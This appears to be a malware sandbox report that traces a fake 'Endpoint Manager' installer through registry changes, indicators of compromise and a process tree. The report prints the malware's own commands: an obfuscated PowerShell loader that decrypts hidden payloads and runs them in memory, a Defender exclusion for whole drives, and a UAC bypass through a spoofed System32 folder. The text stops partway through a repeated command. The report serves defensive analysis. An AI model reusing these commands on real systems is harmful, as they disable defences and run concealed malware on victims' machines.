Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\03E5B6ACB616E5A4CB0225268956CCA0\DefaultFeature	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\03E5B6ACB616E5A4CB0225268956CCA0	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\03E5B6ACB616E5A4CB0225268956CCA0\SourceList\PackageName = "em_6hvuwiqE_installer_Win7-Win11_x86_x64.msi"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\03E5B6ACB616E5A4CB0225268956CCA0	msiexec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\03E5B6ACB616E5A4CB0225268956CCA0\Clients = 3a0000000000	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\CDM	ITSMService.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CDM\proxy = "false"	ITSMService.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\03E5B6ACB616E5A4CB0225268956CCA0\AuthorizedLUAApp = "0"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\DD4D523EF099D7E42B1DBDFD40CF9061	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\03E5B6ACB616E5A4CB0225268956CCA0\SourceList\Net	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\03E5B6ACB616E5A4CB0225268956CCA0\ProductIcon = "C:\\Windows\\Installer\\{CA6B5E30-616B-4A5E-BC20-52629865CC0A}\\icon.ico"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\03E5B6ACB616E5A4CB0225268956CCA0\InstanceType = "0"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\03E5B6ACB616E5A4CB0225268956CCA0\SourceList\Media\1 = ";"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\03E5B6ACB616E5A4CB0225268956CCA0\PackageCode = "DFFE6588FCABA52429605389FCB2DC8B"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\03E5B6ACB616E5A4CB0225268956CCA0\Version = "134527975"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\03E5B6ACB616E5A4CB0225268956CCA0\AdvertiseFlags = "388"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\03E5B6ACB616E5A4CB0225268956CCA0\SourceList\Net\1 = "C:\\Users\\Admin\\Downloads\\em_6hvuwiqE_installer_Win7-Win11_x86_x64\\"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\03E5B6ACB616E5A4CB0225268956CCA0\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\Downloads\\em_6hvuwiqE_installer_Win7-Win11_x86_x64\\"	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings	chrome.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\03E5B6ACB616E5A4CB0225268956CCA0\DeploymentFlags = "3"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\DD4D523EF099D7E42B1DBDFD40CF9061\03E5B6ACB616E5A4CB0225268956CCA0	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\03E5B6ACB616E5A4CB0225268956CCA0\ProductName = "Endpoint Manager Test"	ITSMService.exe

NTFS ADS 1 IoCs

Processes:

chrome.exe

description ioc process

File opened for modification C:\Users\Admin\Downloads\em_6hvuwiqE_installer_Win7-Win11_x86_x64.rar:Zone.Identifier chrome.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

4532 PING.EXE
Suspicious behavior: AddClipboardFormatListener 5 IoCs

Processes:

ITSMAgent.exeITSMAgent.exeITSMAgent.exeITSMAgent.exeITSMAgent.exe

pid process

4160 ITSMAgent.exe
4752 ITSMAgent.exe
1252 ITSMAgent.exe
6072 ITSMAgent.exe
648 ITSMAgent.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Downloads\em_6hvuwiqE_installer_Win7-Win11_x86_x64.rar:Zone.Identifier	chrome.exe

pid	process
4532	PING.EXE

pid	process
4160	ITSMAgent.exe
4752	ITSMAgent.exe
1252	ITSMAgent.exe
6072	ITSMAgent.exe
648	ITSMAgent.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

chrome.exechrome.exemsiexec.exeITSMService.exepowershell.exepowershell.exepowershell.exeBlind.pifpowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
2532	chrome.exe
2532	chrome.exe
5092	chrome.exe
5092	chrome.exe
3172	msiexec.exe
3172	msiexec.exe
3028	ITSMService.exe
3028	ITSMService.exe
852	powershell.exe
852	powershell.exe
852	powershell.exe
960	powershell.exe
960	powershell.exe
960	powershell.exe
3052	powershell.exe
3052	powershell.exe
3052	powershell.exe
4568	Blind.pif
4568	Blind.pif
4568	Blind.pif
4568	Blind.pif
4568	Blind.pif
4568	Blind.pif
2144	powershell.exe
2144	powershell.exe
2144	powershell.exe
4432	powershell.exe
4432	powershell.exe
4964	powershell.exe
4964	powershell.exe
4432	powershell.exe
4964	powershell.exe
3852	powershell.exe
3852	powershell.exe
3852	powershell.exe
448	powershell.exe
448	powershell.exe
448	powershell.exe
5424	powershell.exe
5424	powershell.exe
5424	powershell.exe
3052	powershell.exe
3052	powershell.exe
3052	powershell.exe
3052	powershell.exe
3052	powershell.exe
3052	powershell.exe
3052	powershell.exe
3052	powershell.exe
3052	powershell.exe
3052	powershell.exe
3052	powershell.exe
3052	powershell.exe
3052	powershell.exe
3052	powershell.exe
3052	powershell.exe
3028	ITSMService.exe
3028	ITSMService.exe
3052	powershell.exe
3052	powershell.exe
852	powershell.exe
852	powershell.exe
852	powershell.exe
4568	Blind.pif

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs

Processes:

chrome.exe

pid process

2532 chrome.exe
2532 chrome.exe
2532 chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

chrome.exe

description	pid	process
Token: SeShutdownPrivilege	2532	chrome.exe
Token: SeCreatePagefilePrivilege	2532	chrome.exe
Token: SeShutdownPrivilege	2532	chrome.exe
Token: SeCreatePagefilePrivilege	2532	chrome.exe
Token: SeShutdownPrivilege	2532	chrome.exe
Token: SeCreatePagefilePrivilege	2532	chrome.exe
Token: SeShutdownPrivilege	2532	chrome.exe
Token: SeCreatePagefilePrivilege	2532	chrome.exe
Token: SeShutdownPrivilege	2532	chrome.exe
Token: SeCreatePagefilePrivilege	2532	chrome.exe
Token: SeShutdownPrivilege	2532	chrome.exe
Token: SeCreatePagefilePrivilege	2532	chrome.exe
Token: SeShutdownPrivilege	2532	chrome.exe
Token: SeCreatePagefilePrivilege	2532	chrome.exe
Token: SeShutdownPrivilege	2532	chrome.exe
Token: SeCreatePagefilePrivilege	2532	chrome.exe
Token: SeShutdownPrivilege	2532	chrome.exe
Token: SeCreatePagefilePrivilege	2532	chrome.exe
Token: SeShutdownPrivilege	2532	chrome.exe
Token: SeCreatePagefilePrivilege	2532	chrome.exe
Token: SeShutdownPrivilege	2532	chrome.exe
Token: SeCreatePagefilePrivilege	2532	chrome.exe
Token: SeShutdownPrivilege	2532	chrome.exe
Token: SeCreatePagefilePrivilege	2532	chrome.exe
Token: SeShutdownPrivilege	2532	chrome.exe
Token: SeCreatePagefilePrivilege	2532	chrome.exe
Token: SeShutdownPrivilege	2532	chrome.exe
Token: SeCreatePagefilePrivilege	2532	chrome.exe
Token: SeShutdownPrivilege	2532	chrome.exe
Token: SeCreatePagefilePrivilege	2532	chrome.exe
Token: SeShutdownPrivilege	2532	chrome.exe
Token: SeCreatePagefilePrivilege	2532	chrome.exe
Token: SeShutdownPrivilege	2532	chrome.exe
Token: SeCreatePagefilePrivilege	2532	chrome.exe
Token: SeShutdownPrivilege	2532	chrome.exe
Token: SeCreatePagefilePrivilege	2532	chrome.exe
Token: SeShutdownPrivilege	2532	chrome.exe
Token: SeCreatePagefilePrivilege	2532	chrome.exe
Token: SeShutdownPrivilege	2532	chrome.exe
Token: SeCreatePagefilePrivilege	2532	chrome.exe
Token: SeShutdownPrivilege	2532	chrome.exe
Token: SeCreatePagefilePrivilege	2532	chrome.exe
Token: SeShutdownPrivilege	2532	chrome.exe
Token: SeCreatePagefilePrivilege	2532	chrome.exe
Token: SeShutdownPrivilege	2532	chrome.exe
Token: SeCreatePagefilePrivilege	2532	chrome.exe
Token: SeShutdownPrivilege	2532	chrome.exe
Token: SeCreatePagefilePrivilege	2532	chrome.exe
Token: SeShutdownPrivilege	2532	chrome.exe
Token: SeCreatePagefilePrivilege	2532	chrome.exe
Token: SeShutdownPrivilege	2532	chrome.exe
Token: SeCreatePagefilePrivilege	2532	chrome.exe
Token: SeShutdownPrivilege	2532	chrome.exe
Token: SeCreatePagefilePrivilege	2532	chrome.exe
Token: SeShutdownPrivilege	2532	chrome.exe
Token: SeCreatePagefilePrivilege	2532	chrome.exe
Token: SeShutdownPrivilege	2532	chrome.exe
Token: SeCreatePagefilePrivilege	2532	chrome.exe
Token: SeShutdownPrivilege	2532	chrome.exe
Token: SeCreatePagefilePrivilege	2532	chrome.exe
Token: SeShutdownPrivilege	2532	chrome.exe
Token: SeCreatePagefilePrivilege	2532	chrome.exe
Token: SeShutdownPrivilege	2532	chrome.exe
Token: SeCreatePagefilePrivilege	2532	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

chrome.exe

pid	process
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe

Suspicious use of SendNotifyMessage 62 IoCs

Processes:

chrome.exeITSMAgent.exeBlind.pifITSMAgent.exe

pid	process
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
2532	chrome.exe
4752	ITSMAgent.exe
4752	ITSMAgent.exe
4752	ITSMAgent.exe
4752	ITSMAgent.exe
4752	ITSMAgent.exe
4752	ITSMAgent.exe
4752	ITSMAgent.exe
4752	ITSMAgent.exe
4752	ITSMAgent.exe
4752	ITSMAgent.exe
4752	ITSMAgent.exe
4752	ITSMAgent.exe
4752	ITSMAgent.exe
4752	ITSMAgent.exe
4752	ITSMAgent.exe
4568	Blind.pif
4568	Blind.pif
4568	Blind.pif
4752	ITSMAgent.exe
4752	ITSMAgent.exe
4752	ITSMAgent.exe
4752	ITSMAgent.exe
4752	ITSMAgent.exe
4752	ITSMAgent.exe
4752	ITSMAgent.exe
4752	ITSMAgent.exe
4752	ITSMAgent.exe
4752	ITSMAgent.exe
4752	ITSMAgent.exe
648	ITSMAgent.exe
648	ITSMAgent.exe
648	ITSMAgent.exe
648	ITSMAgent.exe
648	ITSMAgent.exe
648	ITSMAgent.exe
648	ITSMAgent.exe
648	ITSMAgent.exe
648	ITSMAgent.exe
648	ITSMAgent.exe
648	ITSMAgent.exe
648	ITSMAgent.exe
648	ITSMAgent.exe
648	ITSMAgent.exe
648	ITSMAgent.exe
648	ITSMAgent.exe
648	ITSMAgent.exe
648	ITSMAgent.exe
648	ITSMAgent.exe
648	ITSMAgent.exe
648	ITSMAgent.exe

Suspicious use of SetWindowsHookEx 19 IoCs

Processes:

ITSMService.exeITSMAgent.exeITSMAgent.exeITSMAgent.exeITSMAgent.exeITSMAgent.exe

pid	process
3028	ITSMService.exe
3028	ITSMService.exe
3028	ITSMService.exe
3028	ITSMService.exe
3028	ITSMService.exe
3028	ITSMService.exe
3028	ITSMService.exe
3028	ITSMService.exe
3028	ITSMService.exe
3028	ITSMService.exe
4160	ITSMAgent.exe
4752	ITSMAgent.exe
1252	ITSMAgent.exe
3028	ITSMService.exe
3028	ITSMService.exe
3028	ITSMService.exe
3028	ITSMService.exe
6072	ITSMAgent.exe
648	ITSMAgent.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 2532 wrote to memory of 3456	2532	chrome.exe	chrome.exe
PID 2532 wrote to memory of 3456	2532	chrome.exe	chrome.exe
PID 2532 wrote to memory of 3528	2532	chrome.exe	chrome.exe
PID 2532 wrote to memory of 3528	2532	chrome.exe	chrome.exe
PID 2532 wrote to memory of 3528	2532	chrome.exe	chrome.exe
PID 2532 wrote to memory of 3528	2532	chrome.exe	chrome.exe
PID 2532 wrote to memory of 3528	2532	chrome.exe	chrome.exe
PID 2532 wrote to memory of 3528	2532	chrome.exe	chrome.exe
PID 2532 wrote to memory of 3528	2532	chrome.exe	chrome.exe
PID 2532 wrote to memory of 3528	2532	chrome.exe	chrome.exe
PID 2532 wrote to memory of 3528	2532	chrome.exe	chrome.exe
PID 2532 wrote to memory of 3528	2532	chrome.exe	chrome.exe
PID 2532 wrote to memory of 3528	2532	chrome.exe	chrome.exe
PID 2532 wrote to memory of 3528	2532	chrome.exe	chrome.exe
PID 2532 wrote to memory of 3528	2532	chrome.exe	chrome.exe
PID 2532 wrote to memory of 3528	2532	chrome.exe	chrome.exe
PID 2532 wrote to memory of 3528	2532	chrome.exe	chrome.exe
PID 2532 wrote to memory of 3528	2532	chrome.exe	chrome.exe
PID 2532 wrote to memory of 3528	2532	chrome.exe	chrome.exe
PID 2532 wrote to memory of 3528	2532	chrome.exe	chrome.exe
PID 2532 wrote to memory of 3528	2532	chrome.exe	chrome.exe
PID 2532 wrote to memory of 3528	2532	chrome.exe	chrome.exe
PID 2532 wrote to memory of 3528	2532	chrome.exe	chrome.exe
PID 2532 wrote to memory of 3528	2532	chrome.exe	chrome.exe
PID 2532 wrote to memory of 3528	2532	chrome.exe	chrome.exe
PID 2532 wrote to memory of 3528	2532	chrome.exe	chrome.exe
PID 2532 wrote to memory of 3528	2532	chrome.exe	chrome.exe
PID 2532 wrote to memory of 3528	2532	chrome.exe	chrome.exe
PID 2532 wrote to memory of 3528	2532	chrome.exe	chrome.exe
PID 2532 wrote to memory of 3528	2532	chrome.exe	chrome.exe
PID 2532 wrote to memory of 3528	2532	chrome.exe	chrome.exe
PID 2532 wrote to memory of 3528	2532	chrome.exe	chrome.exe
PID 2532 wrote to memory of 3528	2532	chrome.exe	chrome.exe
PID 2532 wrote to memory of 3440	2532	chrome.exe	chrome.exe
PID 2532 wrote to memory of 3440	2532	chrome.exe	chrome.exe
PID 2532 wrote to memory of 1512	2532	chrome.exe	chrome.exe
PID 2532 wrote to memory of 1512	2532	chrome.exe	chrome.exe
PID 2532 wrote to memory of 1512	2532	chrome.exe	chrome.exe
PID 2532 wrote to memory of 1512	2532	chrome.exe	chrome.exe
PID 2532 wrote to memory of 1512	2532	chrome.exe	chrome.exe
PID 2532 wrote to memory of 1512	2532	chrome.exe	chrome.exe
PID 2532 wrote to memory of 1512	2532	chrome.exe	chrome.exe
PID 2532 wrote to memory of 1512	2532	chrome.exe	chrome.exe
PID 2532 wrote to memory of 1512	2532	chrome.exe	chrome.exe
PID 2532 wrote to memory of 1512	2532	chrome.exe	chrome.exe
PID 2532 wrote to memory of 1512	2532	chrome.exe	chrome.exe
PID 2532 wrote to memory of 1512	2532	chrome.exe	chrome.exe
PID 2532 wrote to memory of 1512	2532	chrome.exe	chrome.exe
PID 2532 wrote to memory of 1512	2532	chrome.exe	chrome.exe
PID 2532 wrote to memory of 1512	2532	chrome.exe	chrome.exe
PID 2532 wrote to memory of 1512	2532	chrome.exe	chrome.exe
PID 2532 wrote to memory of 1512	2532	chrome.exe	chrome.exe
PID 2532 wrote to memory of 1512	2532	chrome.exe	chrome.exe
PID 2532 wrote to memory of 1512	2532	chrome.exe	chrome.exe
PID 2532 wrote to memory of 1512	2532	chrome.exe	chrome.exe
PID 2532 wrote to memory of 1512	2532	chrome.exe	chrome.exe
PID 2532 wrote to memory of 1512	2532	chrome.exe	chrome.exe
PID 2532 wrote to memory of 1512	2532	chrome.exe	chrome.exe
PID 2532 wrote to memory of 1512	2532	chrome.exe	chrome.exe
PID 2532 wrote to memory of 1512	2532	chrome.exe	chrome.exe
PID 2532 wrote to memory of 1512	2532	chrome.exe	chrome.exe
PID 2532 wrote to memory of 1512	2532	chrome.exe	chrome.exe
PID 2532 wrote to memory of 1512	2532	chrome.exe	chrome.exe
PID 2532 wrote to memory of 1512	2532	chrome.exe	chrome.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3404

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://download.tglobal.cl/
2⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2532

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd82e1ab58,0x7ffd82e1ab68,0x7ffd82e1ab78
3⤵
PID:3456

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1580 --field-trial-handle=1784,i,7100984196600672354,14094566664988449679,131072 /prefetch:2
3⤵
PID:3528

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=1784,i,7100984196600672354,14094566664988449679,131072 /prefetch:8
3⤵
PID:3440

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2168 --field-trial-handle=1784,i,7100984196600672354,14094566664988449679,131072 /prefetch:8
3⤵
PID:1512

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2908 --field-trial-handle=1784,i,7100984196600672354,14094566664988449679,131072 /prefetch:1
3⤵
PID:1592

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2928 --field-trial-handle=1784,i,7100984196600672354,14094566664988449679,131072 /prefetch:1
3⤵
PID:956

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4248 --field-trial-handle=1784,i,7100984196600672354,14094566664988449679,131072 /prefetch:8
3⤵
PID:1504

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4372 --field-trial-handle=1784,i,7100984196600672354,14094566664988449679,131072 /prefetch:8
3⤵
PID:4304

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=2296 --field-trial-handle=1784,i,7100984196600672354,14094566664988449679,131072 /prefetch:1
3⤵
PID:3808

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4512 --field-trial-handle=1784,i,7100984196600672354,14094566664988449679,131072 /prefetch:8
3⤵
PID:1232

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4616 --field-trial-handle=1784,i,7100984196600672354,14094566664988449679,131072 /prefetch:2
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:5092

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4008 --field-trial-handle=1784,i,7100984196600672354,14094566664988449679,131072 /prefetch:8
3⤵
- NTFS ADS
PID:960

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4252 --field-trial-handle=1784,i,7100984196600672354,14094566664988449679,131072 /prefetch:8
3⤵
PID:2380

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\em_6hvuwiqE_installer_Win7-Win11_x86_x64\" -spe -an -ai#7zMap9829:142:7zEvent1901
2⤵
PID:3784

C:\Windows\System32\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\em_6hvuwiqE_installer_Win7-Win11_x86_x64\em_6hvuwiqE_installer_Win7-Win11_x86_x64.msi"
2⤵
- Blocklisted process makes network request
- Enumerates connected drives
PID:1740

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Downloads\em_6hvuwiqE_installer_Win7-Win11_x86_x64\Installer_x86.64.bat"
2⤵
PID:2700

C:\Windows\system32\cmd.exe
cmd /c "set __=^&rem"
3⤵
PID:4544

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sJl2XjZKf8P7tPC5O2PSWiH6SZ3l6PRhIjOOagsFras='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fhDkWQnfS8p4V+IfnbnFyA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $TFrJJ=New-Object System.IO.MemoryStream(,$param_var); $YnvVD=New-Object System.IO.MemoryStream; $ImDpI=New-Object System.IO.Compression.GZipStream($TFrJJ, [IO.Compression.CompressionMode]::Decompress); $ImDpI.CopyTo($YnvVD); $ImDpI.Dispose(); $TFrJJ.Dispose(); $YnvVD.Dispose(); $YnvVD.ToArray();}function execute_function($param_var,$param2_var){ $SAFWT=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ptUtT=$SAFWT.EntryPoint; $ptUtT.Invoke($null, $param2_var);}$VaxeO = 'C:\Users\Admin\Downloads\em_6hvuwiqE_installer_Win7-Win11_x86_x64\Installer_x86.64.bat';$host.UI.RawUI.WindowTitle = $VaxeO;$shjSd=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($VaxeO).Split([Environment]::NewLine);foreach ($UeMNZ in $shjSd) { if ($UeMNZ.StartsWith('IJHdbaJyZGSbGkOhEMiD')) { $MDHMQ=$UeMNZ.Substring(20); break; }}$payloads_var=[string[]]$MDHMQ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
3⤵
PID:3668

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:852

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:960

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"
4⤵
PID:2476

C:\Windows \System32\ComputerDefaults.exe
"C:\Windows \System32\ComputerDefaults.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1772

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c call SC.cmd
6⤵
PID:4912

C:\Windows\SysWOW64\cmd.exe
cmd /c "set __=^&rem"
7⤵
PID:2896

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sJl2XjZKf8P7tPC5O2PSWiH6SZ3l6PRhIjOOagsFras='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fhDkWQnfS8p4V+IfnbnFyA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $TFrJJ=New-Object System.IO.MemoryStream(,$param_var); $YnvVD=New-Object System.IO.MemoryStream; $ImDpI=New-Object System.IO.Compression.GZipStream($TFrJJ, 